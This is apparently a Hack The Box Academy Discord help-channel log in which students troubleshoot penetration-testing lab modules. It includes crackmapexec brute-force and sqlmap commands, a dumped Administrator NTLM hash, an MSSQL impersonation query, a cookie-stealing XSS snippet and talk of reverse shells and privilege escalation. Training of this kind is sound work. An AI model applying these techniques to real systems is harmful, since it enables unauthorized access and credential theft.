#modules
Could use a hand on the logrotate module,
I run the exploit, trigger the log rotation, and then the exploit fails when it tries to validate the payload written:
target = fopen(targetpath, "w");
if(target == NULL)
{
fclose(source);
printf("Shit 2!\n"); // Yeah, this line's mine, debugging...
exit(EXIT_FAILURE);
}
I guess one prerequisite for the whole thing even working is that logrotate runs as root. But if it wasn't then what's the point of the lab?! What am I missing?
I think I need some help with the Active Subdomain Enumeration.
I exported TARGET="<ip address>" and then ran: nslookup -query=TXT $TARGET.
But I am getting an error that the server can't find the IP address.
The weird thing I am noticing is that the error message is printing the IP address in reverse.
Hi there, I'm new to HTB. I keep getting this error when trying to run sudo /home/nibbler/personal/stuff/monitor in the Nibbler box. Been trying to finish this room up for a bit now and just can't seem to progress. I keep getting a "command not found" error when inputting the above command. I could use some help. Thanks in advance and many blessings.
What command are you trying to run with sudo?
Hi, I'm stuck on Windows Privilege Escalation Skills Assessment - Part II, question 2.
Already got a reverse shell in Meterpreter, but it always times out.
Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value>
I think you could also use a PowerShell reverse shell, a base64 encrypted one-liner or just without encryption, as you want.
No, I mean I'm on the exploit.
I think I know the issue: I need to be fast and type the command right after getting Meterpreter.
But I don't understand why you'd rather use Meterpreter and not nc.
I followed a kernel exploit.
are you sure it's a kernel exploit?
Sure, I've already finished now.
strange
Module: Attacking Common Applications - Skills Assessment II
Question: What is the FQDN of the third vhost?
Tried: dig axfr inlanefreight.local @IP
inlanefreight.local failed: connection refused.
Should I reset the target or am I missing something? Vhosts added to /etc/hosts
Take, say, the password brute forcing, where you must brute-force via SSH and the password is, say, #2135984 on the list... that's (needlessly) frustrating... yes, I know I'm exaggerating, yes, one could always use a different word list, but it's not like you're given any indication of what the password may be.... OK, rant over.
It's been a LONG time since I did that, but (and I could well be mis-remembering), one (and only one) of the hosts has unauthenticated AXFR... is this the only host that's available to look at? If not, you might write a script to loop through and check all of them...
We are used to the fact that if we want to crack a password, rockyou.txt is the list of choice and we can crack the password within 1-2 minutes.
But the reality is different.
Sometimes it takes longer and outside of CTFs, rockyou.txt is no longer the list of choice.
I think that's exactly what the module is trying to convey.
Hey guys, need help with Module: Password Attacks, Section: Pass the Hash, question no. 4.
Would be nice if it gave some guidance on what to try... If I'm on a real engagement, I know who the customer is, where they are located, etc., and can make some educated guesses. But in the SSH brute forcing, nope. Yes, it can be representative of real life... But even then, no, at least not for me, as I've never brute forced hundreds of thousands of passwords against a single SSH host against a single user like that.
Creating diagrams and noting down the IP addresses and subnet details of the systems is an invaluable tip from that module. It significantly aided my understanding. you might find this video by John Hammond useful https://www.youtube.com/watch?v=pbR_BNSOaMk
Try brute forcing a different service, not ssh.
Are you running the command line as admin?
Yes, I was not running the cmd as admin. Thanks for your response.
same result with import-module command get-GPPPassword. Did exactly like hacker13.. and it worked
I'm going from memory, but whatever it was, I was literally doing what the module stated to do, and it was brutal. Someone else mentioned frustration, someone said nothing should be frustrating you, just challenging you; I highlight a legit frustration of mine -- if you were never frustrated, all the power to you. Yes, oftentimes it was a failure of doing something wrong (or at least not right), but I stand behind my belief that SOME portions of SOME modules are just legit frustrating, period, end of story, and we can agree to disagree.
And while we might agree to disagree on the nature of this challenge, the key takeaway is that perseverance and resilience in the face of frustration are good traits in any learning process, especially hacking. But it's perfectly okay to take a step back, take a deep breath, and approach the problem again with a different perspective. Keep at it and who knows... when I look back, the most frustrating bits I faced were where I learned the most.
Password Attacks Lab - Hard
Referred to forums for help, but to no avail.
I'm stuck at the very initial step where I need to brute force to obtain Johanna's password for SMB/RDP. I tried using Crowbar, CrackMapExec, and Hydra with both mutated and original password lists and it either takes way too long or is unable to find any password.
Any hints on what possible tools to use will be appreciated. Thank you!
Use CrackMapExec and WinRM with the mutated password list.
crackmapexec winrm 10.129.X.X -u johanna -p mut_password.list
I did try this before, but it went on for like 5 hours IIRC.
Is this normal?
I can't remember but it shouldn't take 5 hours, give it another go.
^
🫡 I will try again, thank you
Prepare yourself, the BitLocker part might take 5 hours though.
Can you please help with SAM "ssh"? I have logged into SSH but could not find the flag.
look around
that's all i can say lol
Hello everyone! Excuse me, I have a problem when I try to use gobuster to complete the task with this command:
gobuster dir -u http:\94.237.57.142:58207\ -w /usr/share/wordlists/dirb/common.txt
I receive this error message: Error: required flag(s) "wordlist" not set
Does the wordlist exist in that directory?
it really won't, there's plenty of links in this chat regarding mounting bitlocker to linux
¯\_(ツ)_/¯
But how can I install it? hehe
Well, it's generally installed with dirbuster.
yes
Oh, let me search about this, thanks.
https://medium.com/@kartik.sharma522/mounting-bit-locker-encrypted-vhd-files-in-linux-4b3f543251f0 this is by far the simplest guide
This one you can follow almost completely braindead.
The first time I did it I mounted it on the host; the second time I decided to try mounting it in the VM.
your notes contain spoiler
as long as it works for you
Excuse me, I'll check, but dirbuster is already installed on my device...
¯\_(ツ)_/¯
locate common.txt
Oh sure, I'm gonna try.
Yes, I did it the same way, but gobuster can't execute the command.
Update: the command does not work if we use tmux... hahaha lol
thanks
Hello, I made a tunnel with netsh (10.129.63.134 1515 172.16.6.50 3389), but when I try to connect with xfreerdp I receive some errors and I can't understand why:
[06:31:02:039] [33607:33608] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[06:31:02:039] [33607:33608] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[06:31:02:039] [33607:33608] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
xfreerdp /v:10.129.63.134:1515 /u:user /p:password /cert:ignore
I want to RDP to host B through host A. I created a tunnel with netsh on host A... but it's not working.
Not Pivoting, but the AD skills assessment, and I don't understand why it is working.
It's not working*
Hey, I am having the same issue. Did you work it out? I have no idea. I have the SAM and SYSTEM files, still wrong hash???
Check that section under the pivoting module again, see if there's a step you missed
Module: Attacking Web Apps, Section: Attacking Thick Client Applications --- actually found two files having the magic bytes MZ in them --- but both aren't .NET applications so I can't reconstruct code with de4dot --- any hint?
Already checked n times. I will switch to something else probably.
Yeah, so I used the rectic with the backup password,
copied the hash to the attack machine,
dumped with secretsdump,
and the hash is wrong.
Administrator:500:aad3b435b51404eeaad3b435b51404ee:20ff7845bfb62119d751d9b910547236:::
That's the hash I get, but no matter how I attempt it, the answer is always wrong.
500 is local as well.
So I don't understand??
Try different format
Yeah, I tried that as well.
Marcie
Tried the end hash.
Tried both hashes.
Tried the whole line hahaha.
I used samdump2 for it as well, it gave a different hash, tried them as well, all the same, was wrong.
Look up ntlmv2 hashes
It's stored as LM:NT (which btw hashcat cracks LM first, then permutes that for NT).
I'm confused though, it says to get the files which would be SAM and SYSTEM. Can I get the NTLMv2 hash from SAM and SYSTEM?
Any links to help? I tried to drop mimikatz on the machine to get it, but it gets removed by AV I'm guessing.
Most of the labs have av disabled
You can also see if it's in c:\tools
¯\_(ツ)_/¯
Yeah, already checked, no tools on this machine.
Yeah, I tried that as well.
Hey, same problem here. Any tips if I'm doing something wrong? Got 4 flags and the flag for the 3rd question is the one with the text 'flagfour' in it, and now I can't find anything else.
Yeah, I think it's an issue with the machines.
That's the right flag
Iirc
It's not being accepted though. It got accepted as the answer to the 3rd question lol.
Oh sorry didn't realize you meant something else
can I dm you if you have solved this?
Sorry, just realised it's a different convo.
I don't recall too much, just need to curl a bunch
after getting the proper vhosts.
Okay, no problem. Yeah, did that but 1 flag still missing I guess.
Then you missed a host.
Aren't there 5?
Who is getting this error:
me too
Like I said , I don't recall
Just make sure you're enumerating.
Yeah, mimikatz won't copy across.
Please tag me or DM if anyone can help me with finding the last flag on Virtual Hosts in the Information Gathering module. Want to make sure I'm doing everything correctly. I don't think I've missed anything, but maybe I have.
If doing xfreerdp mount drive with /drive:<fileshare name>,/path/to/file/directory
I really got blocked for 15m
If you're talking about the 502, you were not the only one. Quite a few people had the same issue.
^
Yeah, if anyone can help with my module, flick me a DM if you can. Just found out we're not supposed to DM people, but I'm easy. I have got this far in the Windows Priv Esc module, so anyone stuck on anything, DM me and I can help as best I can.
I mean, it is telling me to slow down with the requests I send to the server and that I've been blocked.
it only appears when I go to the exams tab
Contact support if its related to an exam.
How long did it take for you, if you recall? Been running it for 3-4 hours now...
Is this message always supposed to be here? I had to switch the VPN location for the Pwnbox and I wasn't sure if that message was always there. I asked because I have been having trouble RDP'ing into a remote target IP and I was wondering if that is the issue.
it's always there
netsh drives me crazy
Why?
wait, i can't add images 🙂
Address          Port   Address          Port
10.129.119.249   1562   172.16.6.50      3389
Read and follow #welcome
/v:10.129.119.249:1562 /u:xxxx /p:xxxx /cert:ignore
But it's not working
and I don't understand hy
why*
What does the network look like?
Is port 3389 open on the host 172.16.6.50?
What is the machine 172.16.6.100?
Does machine 10.129.119.249 have direct access to machine 172.16.6.50?
Host A (10.129.119.249, 172.16.5.100), Host B (172.16.6.50). I created a tunnel with netsh on Host A, but I don't understand why I can't RDP to Host B.
Then it should actually work like this. Restart the Lab and try again
Anyone willing to help me with the Nibbles room? Got it mostly figured out, just need a little guidance.
Hi there, I am stuck in TNS section of the Footprinting module. I cannot find any hash password. Could someone please help me? 🙂
A nudge for you, try using chromium browser instead of firefox to analyze the requests this particular section.
Hi guys,
I'm stuck on the skills assessment , ADVANCED SQL INJECTIONS. Could someone please help me? 🥲
I just booted pwnbox and looked into it and realized firefox was not executing the javascript from the target application for some reason.
Hi,
I'm stuck in the ACL Enumeration module, but it's more of a platform issue! The RDP is just really unstable (it crashes often, or I type a letter and it comes like 6 seconds after). I really cannot answer the question because of that...
I tried the Pwnbox and my own VM, same thing...
If you have any idea, I'll take it!
Thanks !
Not sure if it was working on your firefox, but pretty sure you would have realized quicker the POST request being made if the javascript worked.
Finally I figured out the Thick Client Applications part. Man, I wanna cry 😭😭
Credentialed Enumeration - from Windows - Anyone else run into an 'incorrect' username/password when attempting to RDP onto the foothold with the provided creds?
Is anyone able to nslookup 10.10.34.136? I keep getting a *** server can't find 10.10.34.136 error. I'm trying to find the FQDN of that IP address. Is that even the correct approach?
Use single quotes.
Correct, it has a special character, so I've used single quotes, no dice. Also reset a few times, manually typed it in the RDP session, copied and pasted, and did a side-by-side comparison to make sure there were no typos.
I'd have to open the lab again. I don't know right now. usually that is the issue or just wrong username/password.
Wish these boxes were more responsive
This will send a reverse request to your DNS resolver. But it will not know the IP.
||dig NS domain.com @10.10.10.10||
This gives me a communications error to <ip address>: timed out error
You are already using the IP of the target, right?
Yep
VPN and Target is up?
Yeah. I have reset both and redownloaded a new VPN configuration.
This given ip address is a random IP from one of the questions in the module.
Maybe - here's the side by side. In case i'm typing/copy and pasting incorrectly
The question is "What is the FQDN of the ip address 10.10.32.136?" They want me to actually use the IP of the spawned target's IP?
Can you do a zone transfer?
Same error
can i see your command?
Nope. CLI and on hacktarget.com both give me errors.
Show me your command. External websites cannot possibly help because this data is not public 😉
nslookup 10.10.34.136
Hmm..
Give me a few minutes, i'm going to wait to see if it changes with a few minutes of waiting.
You are trying to do a reverse DNS query, which does not work.
Logically, your DNS resolver does not know this IP.
You have to do everything in the lab. Public DNS resolvers cannot help you
Yeah, it's fine for me. Your timer says 115 minutes or less, right? @civic terrace
this one is 111
Does it still show logon failed?
I'll try again here in a couple min. started a full update just in case
Sorry, I guess I don't understand what you mean doing everything in the lab. Do you mean I have to use the IP address of the target even though they give me an IP in the question?
I need help with crackmapexec skills assessment Q3 please if anyone can give a nudge.
What you are technically doing now:
You send a query to your public DNS resolver, for example 9.9.9.9 and ask it for the domain from the IP 10.10.34.136
But it can't answer you because it doesn't know what HTB does. In this case, only the authoritative DNS server itself can answer you and that is the target server.
You must therefore specify your DNS resolver (Target)
Yeah, makes sense, thanks. I guess I am still confused because even if I use the target ip I get the same error.
Target IP = 10.129.42.195
command = nslookup 10.129.24.195
error = *** server can't find 10.129.24.195
Yes, because you also make another reverse DNS query and send it back to your public DNS resolver.
You have to specify the server (Target).
typing this out in case anyone else runs into and searches on discord. Working now with xfreerdp, but same error with rdesktop. Not going to TS rdesktop, just gonna keep pushing with the course on xfreerdp.
I restarted the lab numerous time.
I've done everything to a T in the Nibbles room and still no reverse shell to get the root flag. I've been at it for 3 days and it's infuriating. I've tried multiple connections. I really like the content of HTB, but the machines are so slow and unresponsive it's making me second guess a sub. Any help would be appreciated.
Thanks for the beta. I'll keep trying.
I continue with this exercise over and over again. The HTB tech people said I should try the PowerShell prompt (instead of cmd, as listed in the example). I tried that a few times and I could not generate an answer. Someone suggested that I go back to the command prompt (as used in the module) and I tried that. When I run 'regsvr32.exe SocksOverRDP-Plugin.dll' in the command prompt I get an error. But when I run the same command in the PowerShell prompt it runs as expected. https://academy.hackthebox.com/module/158/section/1439
were you running command prompt as admin?
Oh I forgot that
So you unzipped the file on the box, appended the rev shell to the end of the monitor.sh file, and ran it with sudo?
And the rev shell is pointed at your tun0 IP, yeah?
yes
Just tried again from the beginning and my browser won't connect to the vuln machine. Says server unresponsive.
I've done that. 3x already.
Hello, can anybody help me with an error I am getting in Metasploit?
I am new in this domain so I can't really figure it out by myself.
If you tell us what the problem is and which module you need help with, someone will surely be able to help you.
Msf::OptionValidateError The following options failed to validate: INFILENAME. I get this error after I set the INFILENAME and use exploit.
Don't think there's an option called INFILENAME.
Usually it's FILENAME
or FILEPATH.
but as Payload said: if you tell us what module you're doing we can help better
Can we talk in private, so I can explain the problem better?
no
because you still haven't said the module
so I can't help you further, especially if it's one I haven't done yet
The module is: windows/fileformat/adobe_pdf_embedded_exe
... we mean the Academy module, my guy.
I don't really know what that is.
thanks
In future, this channel is for help with Academy content, not random stuff you're trying to do.
ok
Are all boxes as unresponsive as nibbles?
Trying to get those rank points, eh?
?
Just reran that section and had 0 issues getting root.
Guys, has anyone completed the hard lab of Password Attacks?
I don't know if it's my fault, but it seems as if nothing is working...
I have been stuck here for 3 days now. I know I am using the right commands, but I get error after error.
Tag me if you can help somehow, and eventually, thanks in advance.
What exactly is not working?
I am pretty sure that I have david's password, but when I try to use smbclient, I get the following error:
session setup failed: NT_STATUS_LOGON_FAILURE
Hi :D
Also, I cannot extract the correct hash from the Logins.kdbx file. I mean, I extract one hash, but when I try to crack it, both with John and hashcat, I get errors (on both Kali and Pwnbox).
How did you try it?
So as not to spoil anything, you can also send me a DM
I will send a DM
In the Information Gathering - Web Edition module, it briefly goes over a combination of nslookup and WHOIS to determine if the target is using hosting providers. I wanted to ask why that is important information to know, since wouldn't the hosting providers be out of scope without third party approval?
They're using examples allowed by those companies' bug bounty programs
understood, thank you🙏
Can I DM someone for help on Windows Privilege Escalation Skills Assessment - Part I?
Can I DM someone for help on Using CrackMapExec Skills Assessment?
Hey guys, can anyone suggest an alternative for joomla-brute.py for joomla login bruteforcing?
The nmap script does not seem to work for me and neither does the Metasploit module (I may be doing something wrong of course), so I'd be grateful for any tips.
What is it? State your problem here
Splunk module:
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an analytics-driven SPL search against all data the source process images that are creating an unusually high number of threads in other processes. Enter the outlier process name as your answer where the number of injected threads is greater than two standard deviations above the average. Answer format: _.exe
What does it mean by "process images that are creating an unusually high number of threads"?
Is it talking about processes, DLLs or something else? I need a pointer.
I got it, it has to do with event ID 8.
I could use some help with a question in the Active Subdomain Enumeration module. I'm not sure if my approach is right or if I have the right syntax.
The question is: "Which IP address is assigned to the "ns.inlanefreight.htb" subdomain? Submit the IP address as the answer.
Target machine ip: 10.129.161.101
Subdomain: ns.inlanefreight.htb
Command(s): nslookup $TARGET ns.inlanefreight.htb, dig $TARGET ns.inlanefreighthtb
The nslookup error says "couldn't get address for ns.inlanefreight.htb".
The dig error just displays the server and random information about the server.
Does anyone have an idea how to move forward?
I just looked at my questions for that module to help, and mine says us.inlanefreight.htb, not ns.inlanefreight.htb... not sure if we get slight modifications to questions depending on region though.
Can anyone help me with the Nibbler box? I'm nearly at the end and keep getting an error. Plz help.
Wow. I can't believe the dyslexia tonight. I was so hung up on nslookup, haha. Thanks. Also, I think reversing the domain and the target helped.
||dig a domain @ip||
Try that.
What have you tried?
I was doing ns.inlanefreight.htb instead of us.inlanefreight.htb smh.
Everything except copying the file to make it executable. Trying that now. I've kept getting the error of [[: not found
just trying to execute monitor.sh.
you can try overwriting the content of the file with a shell
Hi,
In the module [macOS Fundamentals] - Where are the applications related to the system stored? I need to find the answer to the question.
Can someone help me?
What do you mean?
Wow the Module: Password attacks' Hard Skills Assessment was the most fun I have had since starting Academy. That was absolutely brilliant. Loved it! Well done HTB
Tried this too, it's somehow taking too long :/
crackmapexec winrm 10.129.X.X -u johanna -p mut_password.list
Any hints on what the password starts with so I can reduce the size of the password list? Not exactly sure why brute forcing this particular lab is taking so long (unlike the ones in medium and easy).. Thank you!
Hello, I am doing the File Upload module, type filter. I have a successful upload but I get "cannot be displayed because it contains errors". Any hint?
Ends with a special character.
Experiment with different file names.
ok
bless you
I got it finally after 3 days.
awesome!
I have found it.
great!
I tried harder things; the easier one is what works.
What are you stuck on exactly and what have you tried?
The MSSQL queries.
Just can't seem to get it.
Like, how am I supposed to find that hidden user in that database file?
Would love a hint
Check the databases.
Having an issue with the questions in web proxies skill assessment. "Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload) "
Just to be clear I have taken the suggested wordlist, re-encoded in the reverse order and ||appended it to the existing cookie||, is that right?
Got it by doing prefix encoding too.
Okay, so I have done all of Web Proxies skills apart from the first question. "The /lucky.php page has a button that appears to be disabled. Try to enable the button, and then click it to get the flag."
I modified the ||disabled|| tag to read ||enabled|| but that doesn't seem to work
The hint is in the name of it, lucky, just keep trying.
Why doesn't my sqlmap work? Module: SQLMap Essentials, Section: Running SQLMap on an HTTP Request, Question 3
sqlmap http://94.237.55.96:45268/case4.php --data='{id:1*}' --batch --level 5 --risk 3 --random-agent --dbs --random-agent
--dump?
I don't know, can you tell me? @wary plover
Same, it doesn't work.
@wary plover
I have used -u.
sqlmap -u 'http://94.237.54.197:41838/case4.php' --data='{id:1*}' --batch --level 5 --risk 3 --random-agent --dbs --random-agent --dump
--data is passing the HTTP request body through,
like when you do --data in a curl request.
I have tried -r but it gives me the same result as with --data.
What exactly is not working?
Do you receive an error message?
Isn't the id parameter supposed to be in quotes as well?
Anyway, try a request file, it would be easier.
How do I send screenshots to this server?
And also read #welcome and verify, then post screenshots. It would be easier to understand the error.
You need to link your main HTB account to Discord.
What does the request you passed to SQLmap look like?
sqlmap -r Desktop/req.txt --batch --dbs
What is in the req.txt file?
POST /case4.php HTTP/1.1
Host: 94.237.54.197:41838
Content-Length: 8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://94.237.54.197:41838
Referer: http://94.237.54.197:41838/case4.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
{"id":*}
Your parameter (value) is wrong.
Oh ok, thank you.
Hi there! I need help with the Attacking GitLab module. I found 7 usernames so far and none was accepted by the HTB portal as the correct answer. I was even able to use 1 to get RCE and got the final flag...
How do we know whether an id_rsa file needs to be cracked?
PS: https://security.stackexchange.com/questions/129724/how-to-check-if-an-ssh-private-key-has-passphrase-or-not
This solved my question, thanks!
If you try to use it and it requires a password.
👍
Anyone at Intro to Whitebox Pentesting SkillAssessment that could give me a hand? I'm stuck at the second exercise where I get "code injection should not be possible, even without sanitization or validation" even after removing || the "new function" part and changing it with a standard "console.log" ||. I tested the code locally to make sure it doesn't crash so I don't see what is causing the check to fail.
I'm on the 'Getting Started' module. I've just completed the web enumeration section and was working through the initial foothold section when I stopped being able to access the web server, and pinging the IP gives 'destination host unreachable'. I've reset the VPN multiple times, changing it from UDP to TCP and changing the server that it's on, but nothing works. Any ideas?
Try this - sqlmap -u http://94.237.55.96:45268/case4.php --method POST --data='{"id":1}' --batch --level 5 --risk 3 --random-agent --dbs -v 3
If the request should be a POST request, you need to specify --method POST. If it’s not specified sqlmap assumes it’s a GET request.
Your data string should have the property names and string values enclosed in double quotes. And you were using the --random-agent switch twice.
(Sorry if this is not the place for these questions)
So, I'm at the final chapter of the Getting Started module, where I have to hack a box without a walkthrough.
I have managed to use Metasploit to get a shell, but I'm logged in as www-data, instead of a normal user like in previous examples.
Can I get some hint on how to escalate privileges? Or did I do something wrong along the way?
www-data is the web user.
I know that
It doesn't seem to have many perms, so I don't know where to go from here.
It's still a "normal" user :P just do stuff that you've done previously in this module.
Check what stuff he does have access to.
Does sudo -l tell you anything?
It can use ||/usr/bin/php||
Check GTFOBins for what that could mean ;)
Well, VM time is over, will give it another shot tomorrow.
You can use something like VirtualBox and download Kali or Parrot and use it that way.
¯\_(ツ)_/¯
I don't have enough RAM for a VM :P
Has anyone already done the "ADVANCED SQL INJECTIONS" module and could give me a hand?
will get a better laptop soon
Hello, as you know, some modules on HTB Academy require a VPN connection. I can't get any efficient connection from the modules that require VPN. When you turn the VPN off and on, it comes on for 5 seconds and then goes away again. Is there anyone who has had a problem with VPN like me and fixed it?
Make sure that 1) you aren't using the Pwnbox at the same time as your VM,
2) you aren't running multiple VPN connections (ps aux | grep openvpn).
I am using more than one VPN, how can I kill them?
sudo killall openvpn
ty
Ask your questions here directly.
Well, I'm currently stuck on the second part of the skills assessment (the RCE part). I'm having a problem with the query ||CREATE FUNCTION||
Did you modify the Python exploit that they give us, or are you trying manually?
I modified the python exploit.
I've modified some queries to make them applicable to the assessment, but I haven't managed to adapt the one I quoted above ...
Hello, is it possible to use evil-winrm or impacket-psexec with netsh?
I am stuck on the DNS section in Attacking Common Services. Anyone solved it and can walk me through?
Follow the instructions in the section, IIRC you need to use the tool suggested.
Hello, can you help me please? I'm doing the File Upload Attacks module and when I upload phpbash.php and visit Server_IP:Port/uploads/phpbash.php, the interface appears but I can't write in it.
It's like a picture, I can't control it.
Hello guys, can you help me please? I sent a stored XSS but I don't receive the cookie. Why? Where should it be displayed?
Then I don't understand the point.
strange
Go through the section again.
Go through the section again.
Yes, and I saw a video where it succeeds, so I don't understand.
Can someone help me with the Information Gathering module -- Active Subdomain Enumeration?
I am lost at how to get the TXT record (part 3).
You probably didn't upload it correctly 👍
what have you tried?
I have completed the zone transfer and got all the other records, but I can't find a TXT record anywhere.
Hi all! Has anyone finished the Kerberos Attacks module and can help me with the SA part? 🙂
If you do a zone transfer you get all records; it exists.
@lusty thicket the hint is that one of the zones will have a TXT record, but the only zones I got are root.inlanefreight and inlanefreight.
There's more
Subdomains exist.
You limited yourself to what you assumed to be the zones,
because it exists on a different subdomain.
A couple of those entries seem interesting
But I guess if you don't know much about networking, you won't see it right away
I think my issue also stemmed from assuming my zone transfer would return all records not just the A record
I did. The lessons on both GET and POST invite the student to try out the fetch request feature in devtools, except there's no request to "copy as fetch" since as I said already the browser doesn't make any usable request
@fathom pendant Thank you! I got it!
yes I read it and tested a lot of options but nothing
strange
```html
<script>
document.body.innerHTML = document.cookie;
</script>
```
with this it is okay
can be added in hint of the section
why on earth does htb provide a password list for the attacking common services section when the password can only be found in rockyou and not in the provided list .... This cost me several hours today
Program 'chisel.exe' failed to run: The specified executable is not a valid application for this OS platform.At line:1
char:1
Some ideas? 😄
I have this flag Apache Tomcat/9.0.31 (Ubuntu) but it is not working, I tried different formats, in the Getting Started module section 7, for the question: Perform a Nmap scan of the target. What is the version of the service from the Nmap scan running on port 8080? Can HTB be wrong?
I tried 9.0.31 and Apache Tomcat 9.0.31 etc..
Try just the name without the version 🙂
wow thanks. I try different things and not this one xD
how do you guyz revise?
I know this is a few days old, but for further clarity and anyone else who has the same question: the DNS server responded and gave you 127.0.0.1 (from its perspective). One way of thinking about this is if you asked someone "Who can give me the address for bob" and they replied "me". You then can ask them for the address, not yourself
im in a country where police doesn't have any power
And is not related at all to this server
Well that sucks. But nothing we can do, again read the #rules
Do you know if there is any problem with htb infra?
Occasionally there's a 502 error
Does anyone keep on getting their RDP connections dropping every 90 seconds and then it takes 5 mins to reconnect before the same thing happens?
regen your vpn and make sure its tcp. You can also contact support as well.
Need to speak to a person? Learn how to reach our support via HTB Labs.
Hello, did you encounter any issues, after sending the URL, i don't receive anything, but my test 10.10.x.x:42060 [302]: GET /?username=test&password=test&submit=Login works fine, i Use my own VM
Hey guys,
im having some problems with the Windows Fundamentals course, im trying to mount using this command after escalating privileges, but for some reason im getting an error.
sudo mount -t cifs -o username=htb-student,password=Academy_WinFun! //Targetip/"Wiggydocs" home/htb-student/Desktop/
Couldn't chdir to home/ws01/htb-student/Desktop/: No such file or directory
anyone have any ideas?
seems like a infra issue... Using PWNBOX and cant get a consistent ARP ping to targets. RDP Sessions also died randomly
yeah it just died on me too, i ended up disabling the firewall and i got disconnected after a couple of minutes.
thanks for that.
So are people having issues with HTB academy? I can't seem to ssh in
In SQL Injection Fundamentals > Subverting Query Logic > Authentication Bypass; It's asking for bypassing the login form as user 'tom'.
I've tried injecting SQL queries but I always end up logging in as 'admin'. I tried [Hints] which is asking me to look at the cheat sheet which didn't help me.
Now, in this executing query, we simply cannot do something like WHERE username != 'admin', so how should I approach this problem?
Executing query: SELECT * FROM logins WHERE username='' AND password = '';
Resolved! Very frustrating, there is no issue when using PWNBOX
Everything working fine on my side
Im working on the skills assessment - hard on attacking common services.
I managed to impersonate John on the mssql and found the linked server. However, I have trouble moving laterally further. Is there something wrong with my query, since I don't see an admin account?
||SQL> EXECUTE('SELECT DISTINCT b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = ''IMPERSONATE''') AT [LOCAL.TEST.LINKED.SRV]
name
john
simon ||
You need to bypass the user password, so you should specify the username as tom and find a logic to bypass the password. OR and AND will help you; what you need is to understand the precedence
I don't get the reference but I smiled 😃
It was a joke because Ive never seen you before
but youre a mod and evidently with the academy team lol
Thanks for the response but I've bypassed the password already, even tried username='tom' or username != 'admin', still getting logged in as 'admin' 
Nevermind, I got the flag 
I don't know why adding comments after the username worked though, gonna go look at it now
can someone explain why i cant see the container listed in the ps command
Lol, does the default banner of SSH include version and specifically hostname and domain?
In Linux I mean
I experienced the issue you have, pay attention to the logic, use AND + OR and pay attention to the precedence , if you can not figure out it, DM me!
Anyone know if parrotbox has rockyou in it?
Edit: yes it does
what is wrong with the targets
restart pc?
Finally completed pentest path. -not the exam
guys, hope you don't mind a noob question
But for a newbie in cybersec, which should I go first CBBH or CPTS? As in which is more digestible for a noob like me. I have basic in IT, but none in cybersec
I have read a few times that they have overlapping knowledge
In this room
https://academy.hackthebox.com/module/115/section/1139
The parrot os vm we are asked to connect to via rdp, but the vm doesn't even have a browser to utilize the file upload vuln
It has tor for some reason but not firefox
type the command firefox into the terminal
Thanks, it launched, but when I was browsing using the application search I couldn't even find it
strange
depends on what you want to focus on, cbbh on web, cpts more on general pentesting. both should set up the foundation well enough
RDP is showing black screen. Anybody know how to fix this?
Press ESC/Enter/Space and etc
What do you do if your keyboard doesn't have an etc key? 😜
use the other mentioned keys
eh a pretty overused one
The only types of jokes I know.
and my reply was more sarcastic than serious
B- for effort
Best grade I ever got. 😅
whats that?
hola amigo who are you tho 😅
this isn't a gen chat; you can find out how to unlock more of the server by reading #welcome
yeah amigo read the rules
ok what is gen chat tho 😅
oh
oh payload ik that =D
a place for random chatter that's unrelated to specific topics; like this channel is for the academy modules
sowy 
where is the general chat?
read #welcome and follow instructions :^)
@lucas_phosphate
I am unable to login into kira account in ssh please help me
@umbral wasp don't worry it's another typically HTB horribly constructed challenge with a large lack of information
Bruteforce the password using the hashcat mutations rule on "LoveYou"
It seems like you're rather upset about it. Imo there's plenty of reasons to be upset about it, but the kira one isn't really one of them
The one thing about that module is patience (and attacking other ports than ssh)
What I dislike about the module is the fact that I have to guess which magic wordlist to use for the specific challenge instead of just picking a damn password from rockyou.txt like any other CTF-challenge / lesson instead of having to make a number of mutated wordlists..
Except, generally, after you make the mutated wordlist - that's the one you use
kira's password is in fact in that list
The module is meant to simulate that you've gathered some info regarding passwords and have some rule list that you pass it through
Often the modules do have you use the provided wordlist(s) in their resources in some fashion
My complaint is that the list ends up extremely long: but it's still dwarfed by rockyou
Well you make a fair point. I actually chose to make a completely new wordlist containing only combinations of loveyou and completely missed the fact that LoveYou is also in the original mutated wordlist. I eat my words.
Yeah the hint is more to speedtrack you to get it, but I think it's still like 5-10 minutes using the original mutated list
Double F
another time-wasting task having to deal with opening the damn document after cracking the password.
Hope am doing this the correct way with the correct wordlist.
For the WINRM segment, Found the username via a nmap scan
Now using the rockyou.txt to brute force the password
In the examples user.list or password.list has been used
Is there anything I missed about a specific wordlist
https://academy.hackthebox.com/module/147/section/1327
good morning everyone.. on active subdomain enumeration, zone transfers section. im not sure what im doing wrong on nslookup. the command "nslookup -type=NS inlanefreight.htb" doesn't work, so i try interactive mode and set the server to my target IP 10.129.128.170 and then try looking for the NS record through interactive mode, which still doesn't give me results, says REFUSED. however if I do "dig ns inlanefreight.htb @10.129.128.170" that does give me the record. Is my nslookup broken or am I missing something with that tool?
thats specifying a custom DNS server
You must also specify a name server with nslookup, as .htb is not an official TLD.
well the first objective is to find the name server
i know it but i want to complete this lab with nslookup not dig
What is the question
Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer.
Is there an actual working attack box solution to mounting the .VHD for the password attack lab hard? Doesn't appear so
i have to specify otherwise it tries to use my gateway by default
Then the goal is not to find the name server, but the FQDN of the name server
and using 1.1.1.1 as my server doesnt work either
Right, because .htb is not an official TLD
